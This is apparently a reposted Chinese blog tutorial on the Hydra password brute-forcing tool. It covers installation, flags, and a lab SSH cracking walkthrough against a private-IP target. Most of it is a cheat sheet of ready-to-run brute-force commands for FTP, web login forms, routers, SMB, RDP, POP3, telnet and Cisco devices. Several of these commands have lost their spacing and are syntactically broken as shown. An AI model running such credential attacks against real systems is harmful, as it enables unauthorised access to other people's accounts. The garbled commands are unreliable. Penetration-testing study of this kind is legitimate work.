暴力破解工具—九头蛇(hydra)使用详解及实战

欢迎搜索公众号:白帽子左一

每天分享更多黑客技能,工具及体系化视频教程(免费领)

九头蛇hydra

hydra是著名组织thc的一款开源的暴力破解密码工具、功能非常强大

kali下是默认安装的、几乎支持所有协议的在线破解。

暴力破解工具—九头蛇(hydra)使用详解及实战插图1

密码能否破解,在于字典是否强大以及电脑的性能。

我们就介绍下,这个装备怎么用

暴力破解工具—九头蛇(hydra)使用详解及实战插图3

首先下载安装

下载地址:https://github.com/vanhauser-thc/thc-hydra

Hydra:Kali是安全从业人员常用的Linux系统,自带有大量安全工具集,Hydra自然也集成在里面,工具位置在密码攻击—在线攻击一栏。

Windows中Hydra安装:

Hydra官方不支持Windows版,需要在GitHub上下载,地址为:

https://github.com/maaaaz/thc-hydra-windows

下载之后解压缩即可。

使用方法

语法:Hydra 参数 IP 服务

参数:

-l login 小写,指定用户名进行破解-L file 大写,指定用户的用户名字典-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。-P file 大写,用于指定密码字典。-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探-M file 指定目标ip列表文件,批量破解。-o file 指定结果输出文件-f 找到第一对登录名或者密码的时候中止破解。-t tasks 同时运行的线程数,默认是16-w time 设置最大超时时间,单位-v / -V 显示详细过程-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)-x 自定义密码。
service:指定服务名,支持的服务跟协议有:telnet,ftp,pop3等等。注意点:1.自己创建字典,然后放在当前的目录下或者指定目录。2.参数可以统一放在最后,格式比如hydraip服务参数。3.如果能确定用户名一项时候,比如web登录破解,直接用-l就可以,然后剩余时间破解密码。4.缺点,如果目标网站登录时候需要验证码就无法破解。5.manhydra最万能。6.或者hydra-Uhttp-form等查看具体帮助。

案例分析

暴破ssh登录密码

环境介绍

攻击机:kali

装有hydra工具

靶机:192.168.154.131

安装ssh服务,正常运行

为了测试方便,我们创建两个简单的字典文件,如下:

暴力破解工具—九头蛇(hydra)使用详解及实战插图5

开始爆破

根据命令参数,组织参数格式如下:

root@kali:/mnthydra -L user.txt -P password.txt -t 2 -vV -e ns 192.168.154.131 ssh

破解成功

因为字典数量比较少,我们可以轻易的破解成功,但是实际情况下,我们可能需要很久。

测试登录

使用得到的用户名/密码登录服务器,登录成功

暴力破解工具—九头蛇(hydra)使用详解及实战插图7

各种协议破解汇总

FTP协议破解

破解ftp:hydra-L 用户名字典 -P 密码字典 -t 6 -e ns IP地址 -v

http协议破解

get方式提交,破解web登录:


hydra -L 用户名字典 -P 密码字典 -t 线程 -v -e ns IP地址 http-get/admin/
hydra -L 用户名字典 -P 密码字典 -t 线程 -v -e ns -f IP地址 http-get/admin/index.php


post方式提交,破解web登录:


hydra -f -l 用户名 -P 密码字典 -V -s9900IP地址 http-post-form"/admin/index.php?action=login:user=USER&pw=PASS:"/index.php …这个是登录的 url后门是POST的数据 其中的用户名密码使用 USER PASS 来代替然后是如果登录出错 会出现的字符 。。。然后开始破解

https协议破解

破解httpshydra-m /index.php -l 用户名 -P 密码字典.txt IP地址 https

路由器破解

hydra-ladmin-x6:10:1a.~!@$%^&()-=-t8192.168.1.1http-get/-ladmin为尝试破解的用户名。-x 6:10:1a. 表示枚举的密码由 数字、小写字母和单字符’.等等组成,长度为 6 - 10 位。-t 8 表示分 8 个并行任务进行爆破尝试。192.168.1.1 为 Router 地址。http-get 为破解方式(协议)

http-proxy协议破解

破解http-proxy:


hydra -l admin -P 字典.txt http-proxy://IP地址

smb破解

破解smb:hydra-l 用户名字典 -P 密码字典 IP地址 smb

Windows远程桌面

破解rdp(windows远程登录):hydraip地址rdp-ladministrator-P密码字典.txt-V

邮箱pop3

破解邮箱pop3hydra-l用户名-P密码字典.txtmy.pop3.mailpop3

telnet破解

hydraip地址telnet-l用户字典.txt-P密码字典.txt-t32-s23-ens-f-V

语音通讯工具teamspeak

hydra-l用户名字典-P密码字典.txt-s端口号-vVipteamspeak

cisco

hydra-P 密码字典 IP地址 ciscohydra-m cloud -P 密码字典 IP地址 cisco-enabl

————————————————

作者「L e x」

原文链接:https://blog.csdn.net/weixin_42350212/article/details/116419960

原创文章 暴力破解工具—九头蛇(hydra)使用详解及实战,版权所有
如若转载,请注明出处:https://www.itxiaozhan.cn/20221403.html

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注